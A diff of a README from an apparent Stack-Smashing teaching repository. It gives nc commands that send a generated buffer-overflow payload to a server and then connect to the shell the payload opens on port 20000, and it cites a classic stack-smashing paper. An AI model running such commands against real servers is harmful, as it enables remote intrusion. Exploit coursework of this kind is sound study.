yangsu/Stack-Smashing/README.md

 This will produce a file called data.dat.
 Use *nc* to send the data to the server:

     cat data.dat | nc {server ip/hostname} {portnumber}

+This will spawn a shell that listens on port 20000.
+Use the following command to connect to the shell:

+    nc {server ip/hostname} 20000

 More info on Stack Vulnerabilities: ["Smashing the Stack for Fun and Profit"](http://inst.eecs.berkeley.edu/~cs161/fa08/papers/stack_smashing.pdf)